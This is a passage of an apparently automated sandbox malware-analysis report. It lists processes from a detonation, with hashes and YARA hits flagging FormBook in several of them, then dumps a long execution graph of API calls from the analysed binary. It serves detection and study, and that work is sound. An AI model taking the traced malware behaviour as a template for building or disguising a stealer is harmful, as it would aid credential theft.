                                                            Path:C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe"
                                                            Imagebase:0xf70000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3409182554.0000000004790000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:10
                                                            Start time:07:44:40
                                                            Start date:25/11/2024
                                                            Path:C:\Windows\SysWOW64\srdelayed.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\SysWOW64\srdelayed.exe"
                                                            Imagebase:0xa0000
                                                            File size:16'384 bytes
                                                            MD5 hash:B5F31FDCE1BE4171124B9749F9D2C600
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:07:44:40
                                                            Start date:25/11/2024
                                                            Path:C:\Windows\SysWOW64\ktmutil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                                            Imagebase:0x770000
                                                            File size:15'360 bytes
                                                            MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3397246670.0000000002780000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3409416368.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3409702511.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:14
                                                            Start time:07:44:54
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe"
                                                            Imagebase:0xf70000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3408793565.0000000000D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:16
                                                            Start time:07:45:06
                                                            Start date:25/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff728280000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:4%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:9.5%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:57
                                                              execution_graph 92499 269c06 92510 20d3be 92499->92510 92501 269c1c 92502 269c91 Mailbox 92501->92502 92591 1f1caa 49 API calls 92501->92591 92519 203200 92502->92519 92504 269c71 92505 269cc5 92504->92505 92592 23b171 48 API calls 92504->92592 92508 26a7ab Mailbox 92505->92508 92593 23cc5c 86 API calls 4 library calls 92505->92593 92511 20d3ca 92510->92511 92512 20d3dc 92510->92512 92594 1fdcae 50 API calls Mailbox 92511->92594 92514 20d3e2 92512->92514 92515 20d40b 92512->92515 92595 20f4ea 92514->92595 92604 1fdcae 50 API calls Mailbox 92515->92604 92516 20d3d4 92516->92501 92627 1fbd30 92519->92627 92521 203267 92523 2032f8 92521->92523 92524 26907a 92521->92524 92587 203628 92521->92587 92700 20c36b 86 API calls 92523->92700 92735 23cc5c 86 API calls 4 library calls 92524->92735 92527 2694df 92527->92587 92770 23cc5c 86 API calls 4 library calls 92527->92770 92529 203313 92529->92527 92557 2034eb _memcpy_s Mailbox 92529->92557 92529->92587 92632 1f2b7a 92529->92632 92533 26926d 92754 23cc5c 86 API calls 4 library calls 92533->92754 92534 26909a 92577 2691fa 92534->92577 92736 1fd645 92534->92736 92535 1ffe30 331 API calls 92538 269407 92535->92538 92538->92587 92759 1fd6e9 92538->92759 92540 2033ce 92546 203465 92540->92546 92547 26945e 92540->92547 92540->92557 92541 20351f 92580 203540 92541->92580 92765 1f6eed 92541->92765 92543 269114 92556 269128 92543->92556 92567 269152 92543->92567 92544 269220 92751 1f1caa 49 API calls 92544->92751 92552 20f4ea 48 API calls 92546->92552 92764 23c942 50 API calls 92547->92764 92560 20346c 92552->92560 92553 269438 92763 23cc5c 86 API calls 4 library calls 92553->92763 92554 26923d 92561 269252 92554->92561 92562 26925e 92554->92562 92746 23cc5c 86 API calls 4 library calls 92556->92746 92557->92533 92557->92534 92557->92541 92557->92553 92559 20c3c3 48 API calls 92557->92559 92575 20f4ea 48 API calls 92557->92575 92579 269394 92557->92579 92584 2693c5 92557->92584 92557->92587 92702 1fd9a0 53 API calls __cinit 92557->92702 92703 1fd8c0 53 API calls 92557->92703 92704 20c2d6 48 API calls _memcpy_s 92557->92704 92705 1ffe30 92557->92705 92755 24cda2 82 API calls Mailbox 92557->92755 92756 2380e3 53 API calls 92557->92756 92757 1fd764 55 API calls 92557->92757 92758 1fdcae 50 API calls Mailbox 92557->92758 92559->92557 92560->92541 92639 1fe8d0 92560->92639 92752 23cc5c 86 API calls 4 library calls 92561->92752 92753 23cc5c 86 API calls 4 library calls 92562->92753 92568 269195 92567->92568 92569 269177 92567->92569 92572 26918b 92568->92572 92748 24f5ee 331 API calls 92568->92748 92747 24f320 331 API calls 92569->92747 92572->92587 92749 20c2d6 48 API calls _memcpy_s 92572->92749 92575->92557 92750 23cc5c 86 API calls 4 library calls 92577->92750 92582 20f4ea 48 API calls 92579->92582 92583 2694b0 92580->92583 92586 203585 92580->92586 92580->92587 92582->92584 92769 1fdcae 50 API calls Mailbox 92583->92769 92584->92535 92586->92527 92586->92587 92588 203615 92586->92588 92590 203635 Mailbox 92587->92590 92734 23cc5c 86 API calls 4 library calls 92587->92734 92701 1fdcae 50 API calls Mailbox 92588->92701 92590->92505 92591->92504 92592->92502 92593->92508 92594->92516 92598 20f4f2 __calloc_impl 92595->92598 92597 20f50c 92597->92516 92598->92597 92599 20f50e std::exception::exception 92598->92599 92605 21395c 92598->92605 92619 216805 RaiseException 92599->92619 92601 20f538 92620 21673b 47 API calls _free 92601->92620 92603 20f54a 92603->92516 92604->92516 92606 2139d7 __calloc_impl 92605->92606 92613 213968 __calloc_impl 92605->92613 92626 217c0e 47 API calls __getptd_noexit 92606->92626 92609 21399b RtlAllocateHeap 92610 2139cf 92609->92610 92609->92613 92610->92598 92612 2139c3 92624 217c0e 47 API calls __getptd_noexit 92612->92624 92613->92609 92613->92612 92614 213973 92613->92614 92617 2139c1 92613->92617 92614->92613 92621 2181c2 47 API calls __NMSG_WRITE 92614->92621 92622 21821f 47 API calls 7 library calls 92614->92622 92623 211145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92614->92623 92625 217c0e 47 API calls __getptd_noexit 92617->92625 92619->92601 92620->92603 92621->92614 92622->92614 92624->92617 92625->92610 92626->92610 92628 1fbd3f 92627->92628 92631 1fbd5a 92627->92631 92771 1fbdfa 92628->92771 92630 1fbd47 CharUpperBuffW 92630->92631 92631->92521 92633 1f2b8b 92632->92633 92634 26436a 92632->92634 92635 20f4ea 48 API calls 92633->92635 92637 1f2b92 92635->92637 92636 1f2bb3 92636->92540 92637->92636 92788 1f2bce 48 API calls 92637->92788 92640 1fe8f6 92639->92640 92699 1fe906 Mailbox 92639->92699 92641 1fed52 92640->92641 92640->92699 92889 20e3cd 331 API calls 92641->92889 92642 1febc7 92644 1febdd 92642->92644 92890 1f2ff6 16 API calls 92642->92890 92644->92557 92646 1fed63 92646->92644 92648 1fed70 92646->92648 92647 1fe94c PeekMessageW 92647->92699 92891 20e312 331 API calls Mailbox 92648->92891 92650 26526e Sleep 92650->92699 92651 1fed77 LockWindowUpdate DestroyWindow GetMessageW 92651->92644 92653 1feda9 92651->92653 92654 2659ef TranslateMessage DispatchMessageW GetMessageW 92653->92654 92654->92654 92657 265a1f 92654->92657 92656 1f1caa 49 API calls 92656->92699 92657->92644 92658 1fed21 PeekMessageW 92658->92699 92660 20f4ea 48 API calls 92660->92699 92661 1febf7 timeGetTime 92661->92699 92662 1f6eed 48 API calls 92662->92699 92663 1fed3a TranslateMessage DispatchMessageW 92663->92658 92664 265557 WaitForSingleObject 92667 265574 GetExitCodeProcess CloseHandle 92664->92667 92664->92699 92666 26588f Sleep 92691 265429 Mailbox 92666->92691 92667->92699 92668 1fedae timeGetTime 92892 1f1caa 49 API calls 92668->92892 92671 265733 Sleep 92671->92691 92673 1f2aae 307 API calls 92673->92699 92675 20dc38 timeGetTime 92675->92691 92676 265926 GetExitCodeProcess 92678 265952 CloseHandle 92676->92678 92679 26593c WaitForSingleObject 92676->92679 92677 265445 Sleep 92677->92699 92678->92691 92679->92678 92679->92699 92680 265432 Sleep 92680->92677 92681 258c4b 108 API calls 92681->92691 92682 1f2c79 107 API calls 92682->92691 92684 2659ae Sleep 92684->92699 92689 1fd6e9 55 API calls 92689->92691 92690 1ffe30 307 API calls 92690->92699 92691->92675 92691->92676 92691->92677 92691->92680 92691->92681 92691->92682 92691->92684 92691->92689 92691->92699 92894 1fd7f7 92691->92894 92899 234cbe 49 API calls Mailbox 92691->92899 92900 1f1caa 49 API calls 92691->92900 92901 1fce19 92691->92901 92907 1f2aae 331 API calls 92691->92907 92908 24ccb2 50 API calls 92691->92908 92909 237a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 92691->92909 92910 236532 63 API calls 3 library calls 92691->92910 92694 203200 307 API calls 92694->92699 92696 1fd6e9 55 API calls 92696->92699 92697 23cc5c 86 API calls 92697->92699 92698 1fce19 48 API calls 92698->92699 92699->92642 92699->92647 92699->92650 92699->92656 92699->92658 92699->92660 92699->92661 92699->92662 92699->92663 92699->92664 92699->92666 92699->92668 92699->92671 92699->92673 92699->92677 92699->92690 92699->92691 92699->92694 92699->92696 92699->92697 92699->92698 92789 1fef00 92699->92789 92796 1ff110 92699->92796 92861 2045e0 92699->92861 92878 20e244 92699->92878 92883 20dc5f 92699->92883 92888 1feed0 331 API calls Mailbox 92699->92888 92893 258d23 48 API calls 92699->92893 92700->92529 92701->92587 92702->92557 92703->92557 92704->92557 92706 1ffe50 92705->92706 92730 1ffe7e 92705->92730 92707 20f4ea 48 API calls 92706->92707 92707->92730 92708 20146e 92709 1f6eed 48 API calls 92708->92709 92731 1fffe1 92709->92731 92710 201473 93869 23cc5c 86 API calls 4 library calls 92710->93869 92711 2297ed InterlockedDecrement 92711->92730 92713 200509 93870 23cc5c 86 API calls 4 library calls 92713->93870 92714 20f4ea 48 API calls 92714->92730 92717 26a922 92717->92557 92718 26a246 92720 1f6eed 48 API calls 92718->92720 92720->92731 92722 1f6eed 48 API calls 92722->92730 92723 1fd7f7 48 API calls 92723->92730 92724 26a873 92724->92557 92725 26a30e 92725->92731 93867 2297ed InterlockedDecrement 92725->93867 92726 210f0a 52 API calls __cinit 92726->92730 92728 26a973 93871 23cc5c 86 API calls 4 library calls 92728->93871 92730->92708 92730->92710 92730->92711 92730->92713 92730->92714 92730->92718 92730->92722 92730->92723 92730->92725 92730->92726 92730->92728 92730->92731 92733 2015b5 92730->92733 93865 201820 331 API calls 2 library calls 92730->93865 93866 201d10 59 API calls Mailbox 92730->93866 92731->92557 92732 26a982 93868 23cc5c 86 API calls 4 library calls 92733->93868 92734->92590 92735->92529 92737 1fd654 92736->92737 92744 1fd67e 92736->92744 92738 1fd65b 92737->92738 92740 1fd6c2 92737->92740 92739 1fd666 92738->92739 92745 1fd6ab 92738->92745 93872 1fd9a0 53 API calls __cinit 92739->93872 92740->92745 93874 20dce0 53 API calls 92740->93874 92744->92543 92744->92544 92745->92744 93873 20dce0 53 API calls 92745->93873 92746->92587 92747->92572 92748->92572 92749->92577 92750->92587 92751->92554 92752->92587 92753->92587 92754->92587 92755->92557 92756->92557 92757->92557 92758->92557 92760 1fd6f4 92759->92760 92761 1fd71b 92760->92761 93875 1fd764 55 API calls 92760->93875 92761->92553 92763->92587 92764->92541 92766 1f6ef8 92765->92766 92767 1f6f00 92765->92767 93876 1fdd47 48 API calls _memcpy_s 92766->93876 92767->92580 92769->92527 92770->92587 92772 1fbe0d 92771->92772 92773 1fbe0a _memcpy_s 92771->92773 92774 20f4ea 48 API calls 92772->92774 92773->92630 92775 1fbe17 92774->92775 92777 20ee75 92775->92777 92779 20f4ea __calloc_impl 92777->92779 92778 21395c __crtLCMapStringA_stat 47 API calls 92778->92779 92779->92778 92780 20f50c 92779->92780 92781 20f50e std::exception::exception 92779->92781 92780->92773 92786 216805 RaiseException 92781->92786 92783 20f538 92787 21673b 47 API calls _free 92783->92787 92785 20f54a 92785->92773 92786->92783 92787->92785 92788->92636 92790 1fef1d 92789->92790 92792 1fef2f 92789->92792 92911 1fe3b0 331 API calls 2 library calls 92790->92911 92912 23cc5c 86 API calls 4 library calls 92792->92912 92793 1fef26 92793->92699 92795 2686f9 92795->92795 92797 1ff130 92796->92797 92799 1ffe30 331 API calls 92797->92799 92803 1ff199 92797->92803 92798 1ff3dd 92802 2687c8 92798->92802 92810 1ff3f2 92798->92810 92848 1ff431 Mailbox 92798->92848 92801 268728 92799->92801 92800 1ff595 92806 1fd7f7 48 API calls 92800->92806 92800->92848 92801->92803 92930 23cc5c 86 API calls 4 library calls 92801->92930 92933 23cc5c 86 API calls 4 library calls 92802->92933 92803->92798 92803->92800 92808 1fd7f7 48 API calls 92803->92808 92839 1ff229 92803->92839 92807 2687a3 92806->92807 92932 210f0a 52 API calls __cinit 92807->92932 92812 268772 92808->92812 92838 1ff418 92810->92838 92934 239af1 48 API calls 92810->92934 92811 268b1b 92822 268bcf 92811->92822 92823 268b2c 92811->92823 92931 210f0a 52 API calls __cinit 92812->92931 92813 1fd6e9 55 API calls 92813->92848 92815 1ff770 92818 268a45 92815->92818 92837 1ff77a 92815->92837 92817 268b7e 92943 24e40a 331 API calls Mailbox 92817->92943 92940 20c1af 48 API calls 92818->92940 92819 268c53 92948 23cc5c 86 API calls 4 library calls 92819->92948 92820 268810 92935 24eef8 331 API calls 92820->92935 92821 1ffe30 331 API calls 92840 1ff6aa 92821->92840 92945 23cc5c 86 API calls 4 library calls 92822->92945 92942 24f5ee 331 API calls 92823->92942 92824 268beb 92946 24bdbd 331 API calls Mailbox 92824->92946 92826 1ffe30 331 API calls 92826->92848 92835 201b90 48 API calls 92835->92848 92836 268c00 92860 1ff537 Mailbox 92836->92860 92947 23cc5c 86 API calls 4 library calls 92836->92947 92913 201b90 92837->92913 92838->92811 92838->92840 92838->92848 92839->92798 92839->92800 92839->92838 92839->92848 92840->92815 92840->92821 92841 1ffce0 92840->92841 92840->92848 92840->92860 92841->92860 92944 23cc5c 86 API calls 4 library calls 92841->92944 92843 268823 92843->92838 92847 26884b 92843->92847 92846 23cc5c 86 API calls 92846->92848 92936 24ccdc 48 API calls 92847->92936 92848->92813 92848->92817 92848->92819 92848->92824 92848->92826 92848->92835 92848->92841 92848->92846 92848->92860 92929 1fdd47 48 API calls _memcpy_s 92848->92929 92941 2297ed InterlockedDecrement 92848->92941 92949 20c1af 48 API calls 92848->92949 92850 268857 92852 268865 92850->92852 92853 2688aa 92850->92853 92937 239b72 48 API calls 92852->92937 92856 2688a0 Mailbox 92853->92856 92938 23a69d 48 API calls 92853->92938 92854 1ffe30 331 API calls 92854->92860 92856->92854 92858 2688e7 92939 1fbc74 48 API calls 92858->92939 92860->92699 92862 204637 92861->92862 92863 20479f 92861->92863 92864 266e05 92862->92864 92865 204643 92862->92865 92866 1fce19 48 API calls 92863->92866 93012 24e822 92864->93012 93011 204300 331 API calls _memcpy_s 92865->93011 92873 2046e4 Mailbox 92866->92873 92869 204739 Mailbox 92869->92699 92870 266e11 92870->92869 93052 23cc5c 86 API calls 4 library calls 92870->93052 92872 204659 92872->92869 92872->92870 92872->92873 92952 236524 92873->92952 92955 1f4252 92873->92955 92961 23fa0c 92873->92961 93002 246ff0 92873->93002 92879 20e253 92878->92879 92880 26df42 92878->92880 92879->92699 92881 26df77 92880->92881 92882 26df59 TranslateAcceleratorW 92880->92882 92882->92879 92884 20dca3 92883->92884 92885 20dc71 92883->92885 92884->92699 92885->92884 92886 20dc96 IsDialogMessageW 92885->92886 92887 26dd1d GetClassLongW 92885->92887 92886->92884 92886->92885 92887->92885 92887->92886 92888->92699 92889->92642 92890->92646 92891->92651 92892->92699 92893->92699 92895 20f4ea 48 API calls 92894->92895 92896 1fd818 92895->92896 92897 20f4ea 48 API calls 92896->92897 92898 1fd826 92897->92898 92898->92691 92899->92691 92900->92691 92902 1fce28 __wsetenvp 92901->92902 92903 20ee75 48 API calls 92902->92903 92904 1fce50 _memcpy_s 92903->92904 92905 20f4ea 48 API calls 92904->92905 92906 1fce66 92905->92906 92906->92691 92907->92691 92908->92691 92909->92691 92910->92691 92911->92793 92912->92795 92914 201cf6 92913->92914 92916 201ba2 92913->92916 92914->92848 92915 201bae 92923 201bb9 92915->92923 92951 20c15c 48 API calls 92915->92951 92916->92915 92918 20f4ea 48 API calls 92916->92918 92919 2649c4 92918->92919 92920 20f4ea 48 API calls 92919->92920 92928 2649cf 92920->92928 92921 201c5d 92921->92848 92922 20f4ea 48 API calls 92924 201c9f 92922->92924 92923->92921 92923->92922 92925 201cb2 92924->92925 92950 1f2925 48 API calls 92924->92950 92925->92848 92927 20f4ea 48 API calls 92927->92928 92928->92915 92928->92927 92929->92848 92930->92803 92931->92839 92932->92848 92933->92860 92934->92820 92935->92843 92936->92850 92937->92856 92938->92858 92939->92856 92940->92848 92941->92848 92942->92848 92943->92841 92944->92860 92945->92860 92946->92836 92947->92860 92948->92860 92949->92848 92950->92925 92951->92923 93053 236ca9 GetFileAttributesW 92952->93053 92956 1f425c 92955->92956 92958 1f4263 92955->92958 93057 2135e4 92956->93057 92959 1f4283 FreeLibrary 92958->92959 92960 1f4272 92958->92960 92959->92960 92960->92869 92962 23fa1c __ftell_nolock 92961->92962 92963 23fa44 92962->92963 93466 1fd286 48 API calls 92962->93466 93363 1f936c 92963->93363 92966 23fa5e 92967 23fb92 92966->92967 92968 23fa80 92966->92968 92969 23fb68 92966->92969 92967->92869 92970 1f936c 81 API calls 92968->92970 93383 1f41a9 92969->93383 92977 23fa8c _wcscpy _wcschr 92970->92977 92973 23fb8e 92973->92967 92974 1f936c 81 API calls 92973->92974 92976 23fbc7 92974->92976 92975 1f41a9 136 API calls 92975->92973 93407 211dfc 92976->93407 92979 23fade _wcscat 92977->92979 92981 23fab0 _wcscat _wcscpy 92977->92981 92980 1f936c 81 API calls 92979->92980 92982 23fafc _wcscpy 92980->92982 92983 1f936c 81 API calls 92981->92983 93467 2372cb GetFileAttributesW 92982->93467 92983->92979 92985 23fb1c __wsetenvp 92985->92967 92986 1f936c 81 API calls 92985->92986 92987 23fb48 92986->92987 93468 2360dd 77 API calls 4 library calls 92987->93468 92988 23fbeb _wcscat _wcscpy 92990 1f936c 81 API calls 92988->92990 92992 23fc82 92990->92992 92991 23fb5c 92991->92967 93410 23690b 92992->93410 92994 23fca2 92995 236524 3 API calls 92994->92995 92996 23fcb1 92995->92996 92997 1f936c 81 API calls 92996->92997 93000 23fce2 92996->93000 92998 23fccb 92997->92998 93416 23bfa4 92998->93416 93001 1f4252 84 API calls 93000->93001 93001->92967 93003 1f936c 81 API calls 93002->93003 93004 24702a 93003->93004 93799 1fb470 93004->93799 93006 24703a 93007 24705f 93006->93007 93008 1ffe30 331 API calls 93006->93008 93010 247063 93007->93010 93827 1fcdb9 48 API calls 93007->93827 93008->93007 93010->92869 93011->92872 93013 24e84e 93012->93013 93014 24e868 93012->93014 93857 23cc5c 86 API calls 4 library calls 93013->93857 93858 24ccdc 48 API calls 93014->93858 93017 24e871 93018 1ffe30 330 API calls 93017->93018 93019 24e8cf 93018->93019 93020 24e96a 93019->93020 93022 24e916 93019->93022 93051 24e860 Mailbox 93019->93051 93021 24e978 93020->93021 93024 24e9c7 93020->93024 93860 23a69d 48 API calls 93021->93860 93859 239b72 48 API calls 93022->93859 93027 1f936c 81 API calls 93024->93027 93024->93051 93026 24e949 93029 2045e0 330 API calls 93026->93029 93030 24e9e1 93027->93030 93028 24e99b 93861 1fbc74 48 API calls 93028->93861 93029->93051 93032 1fbdfa 48 API calls 93030->93032 93034 24ea05 CharUpperBuffW 93032->93034 93033 24e9a3 Mailbox 93036 203200 330 API calls 93033->93036 93035 24ea1f 93034->93035 93037 24ea26 93035->93037 93038 24ea72 93035->93038 93036->93051 93862 239b72 48 API calls 93037->93862 93039 1f936c 81 API calls 93038->93039 93040 24ea7a 93039->93040 93863 1f1caa 49 API calls 93040->93863 93043 24ea54 93044 2045e0 330 API calls 93043->93044 93044->93051 93045 24ea84 93046 1f936c 81 API calls 93045->93046 93045->93051 93047 24ea9f 93046->93047 93864 1fbc74 48 API calls 93047->93864 93049 24eaaf 93050 203200 330 API calls 93049->93050 93050->93051 93051->92870 93052->92869 93054 236cc4 FindFirstFileW 93053->93054 93055 236529 93053->93055 93054->93055 93056 236cd9 FindClose 93054->93056 93055->92869 93056->93055 93058 2135f0 __fcloseall 93057->93058 93059 213604 93058->93059 93060 21361c 93058->93060 93092 217c0e 47 API calls __getptd_noexit 93059->93092 93063 213614 __fcloseall 93060->93063 93070 214e1c 93060->93070 93062 213609 93093 216e10 8 API calls _memcpy_s 93062->93093 93063->92958 93071 214e2c 93070->93071 93072 214e4e EnterCriticalSection 93070->93072 93071->93072 93073 214e34 93071->93073 93074 21362e 93072->93074 93095 217cf4 93073->93095 93076 213578 93074->93076 93077 213587 93076->93077 93078 21359b 93076->93078 93180 217c0e 47 API calls __getptd_noexit 93077->93180 93084 213597 93078->93084 93140 212c84 93078->93140 93080 21358c 93181 216e10 8 API calls _memcpy_s 93080->93181 93094 213653 LeaveCriticalSection LeaveCriticalSection _fprintf 93084->93094 93088 2135b5 93157 21e9d2 93088->93157 93090 2135bb 93090->93084 93091 211c9d _free 47 API calls 93090->93091 93091->93084 93092->93062 93093->93063 93094->93063 93096 217d05 93095->93096 93097 217d18 EnterCriticalSection 93095->93097 93102 217d7c 93096->93102 93097->93074 93099 217d0b 93099->93097 93126 21115b 47 API calls 3 library calls 93099->93126 93103 217d88 __fcloseall 93102->93103 93104 217d91 93103->93104 93105 217da9 93103->93105 93127 2181c2 47 API calls __NMSG_WRITE 93104->93127 93106 217e11 __fcloseall 93105->93106 93120 217da7 93105->93120 93106->93099 93109 217d96 93128 21821f 47 API calls 7 library calls 93109->93128 93110 217dbd 93112 217dd3 93110->93112 93113 217dc4 93110->93113 93116 217cf4 __lock 46 API calls 93112->93116 93131 217c0e 47 API calls __getptd_noexit 93113->93131 93114 217d9d 93129 211145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93114->93129 93119 217dda 93116->93119 93118 217dc9 93118->93106 93121 217de9 InitializeCriticalSectionAndSpinCount 93119->93121 93122 217dfe 93119->93122 93120->93105 93130 2169d0 47 API calls __crtLCMapStringA_stat 93120->93130 93123 217e04 93121->93123 93132 211c9d 93122->93132 93138 217e1a LeaveCriticalSection _doexit 93123->93138 93127->93109 93128->93114 93130->93110 93131->93118 93133 211ca6 RtlFreeHeap 93132->93133 93137 211ccf _free 93132->93137 93134 211cbb 93133->93134 93133->93137 93139 217c0e 47 API calls __getptd_noexit 93134->93139 93136 211cc1 GetLastError 93136->93137 93137->93123 93138->93106 93139->93136 93141 212c97 93140->93141 93145 212cbb 93140->93145 93142 212933 __filbuf 47 API calls 93141->93142 93141->93145 93143 212cb4 93142->93143 93182 21af61 93143->93182 93146 21eb36 93145->93146 93147 21eb43 93146->93147 93149 2135af 93146->93149 93148 211c9d _free 47 API calls 93147->93148 93147->93149 93148->93149 93150 212933 93149->93150 93151 212952 93150->93151 93152 21293d 93150->93152 93151->93088 93319 217c0e 47 API calls __getptd_noexit 93152->93319 93154 212942 93320 216e10 8 API calls _memcpy_s 93154->93320 93156 21294d 93156->93088 93158 21e9de __fcloseall 93157->93158 93159 21e9e6 93158->93159 93160 21e9fe 93158->93160 93336 217bda 47 API calls __getptd_noexit 93159->93336 93162 21ea7b 93160->93162 93167 21ea28 93160->93167 93340 217bda 47 API calls __getptd_noexit 93162->93340 93163 21e9eb 93337 217c0e 47 API calls __getptd_noexit 93163->93337 93166 21ea80 93341 217c0e 47 API calls __getptd_noexit 93166->93341 93170 21a8ed ___lock_fhandle 49 API calls 93167->93170 93168 21e9f3 __fcloseall 93168->93090 93172 21ea2e 93170->93172 93171 21ea88 93342 216e10 8 API calls _memcpy_s 93171->93342 93174 21ea41 93172->93174 93175 21ea4c 93172->93175 93321 21ea9c 93174->93321 93338 217c0e 47 API calls __getptd_noexit 93175->93338 93178 21ea47 93339 21ea73 LeaveCriticalSection __unlock_fhandle 93178->93339 93180->93080 93181->93084 93183 21af6d __fcloseall 93182->93183 93184 21af75 93183->93184 93185 21af8d 93183->93185 93280 217bda 47 API calls __getptd_noexit 93184->93280 93187 21b022 93185->93187 93192 21afbf 93185->93192 93285 217bda 47 API calls __getptd_noexit 93187->93285 93188 21af7a 93281 217c0e 47 API calls __getptd_noexit 93188->93281 93191 21b027 93286 217c0e 47 API calls __getptd_noexit 93191->93286 93207 21a8ed 93192->93207 93193 21af82 __fcloseall 93193->93145 93196 21b02f 93287 216e10 8 API calls _memcpy_s 93196->93287 93197 21afc5 93199 21afd8 93197->93199 93200 21afeb 93197->93200 93216 21b043 93199->93216 93282 217c0e 47 API calls __getptd_noexit 93200->93282 93203 21aff0 93283 217bda 47 API calls __getptd_noexit 93203->93283 93204 21afe4 93284 21b01a LeaveCriticalSection __unlock_fhandle 93204->93284 93208 21a8f9 __fcloseall 93207->93208 93209 21a946 EnterCriticalSection 93208->93209 93210 217cf4 __lock 47 API calls 93208->93210 93211 21a96c __fcloseall 93209->93211 93212 21a91d 93210->93212 93211->93197 93213 21a928 InitializeCriticalSectionAndSpinCount 93212->93213 93214 21a93a 93212->93214 93213->93214 93288 21a970 LeaveCriticalSection _doexit 93214->93288 93217 21b050 __ftell_nolock 93216->93217 93218 21b08d 93217->93218 93219 21b0ac 93217->93219 93250 21b082 93217->93250 93298 217bda 47 API calls __getptd_noexit 93218->93298 93222 21b105 93219->93222 93223 21b0e9 93219->93223 93233 21b11c 93222->93233 93304 21f82f 49 API calls 3 library calls 93222->93304 93301 217bda 47 API calls __getptd_noexit 93223->93301 93224 21b86b 93224->93204 93225 21b092 93299 217c0e 47 API calls __getptd_noexit 93225->93299 93228 21b0ee 93302 217c0e 47 API calls __getptd_noexit 93228->93302 93230 21b099 93300 216e10 8 API calls _memcpy_s 93230->93300 93289 223bf2 93233->93289 93235 21b12a 93236 21b44b 93235->93236 93305 217a0d 47 API calls 2 library calls 93235->93305 93238 21b463 93236->93238 93239 21b7b8 WriteFile 93236->93239 93237 21b0f5 93303 216e10 8 API calls _memcpy_s 93237->93303 93242 21b55a 93238->93242 93248 21b479 93238->93248 93243 21b7e1 GetLastError 93239->93243 93252 21b410 93239->93252 93254 21b565 93242->93254 93256 21b663 93242->93256 93243->93252 93244 21b150 GetConsoleMode 93244->93236 93246 21b189 93244->93246 93245 21b81b 93245->93250 93310 217c0e 47 API calls __getptd_noexit 93245->93310 93246->93236 93247 21b199 GetConsoleCP 93246->93247 93247->93252 93278 21b1c2 93247->93278 93248->93245 93249 21b4e9 WriteFile 93248->93249 93249->93243 93255 21b526 93249->93255 93312 21a70c 93250->93312 93252->93245 93252->93250 93253 21b7f7 93252->93253 93258 21b812 93253->93258 93259 21b7fe 93253->93259 93254->93245 93260 21b5de WriteFile 93254->93260 93255->93248 93255->93252 93266 21b555 93255->93266 93256->93245 93261 21b6d8 WideCharToMultiByte 93256->93261 93257 21b843 93311 217bda 47 API calls __getptd_noexit 93257->93311 93309 217bed 47 API calls 3 library calls 93258->93309 93307 217c0e 47 API calls __getptd_noexit 93259->93307 93260->93243 93265 21b62d 93260->93265 93261->93243 93272 21b71f 93261->93272 93265->93252 93265->93254 93265->93266 93266->93252 93267 21b803 93308 217bda 47 API calls __getptd_noexit 93267->93308 93268 21b727 WriteFile 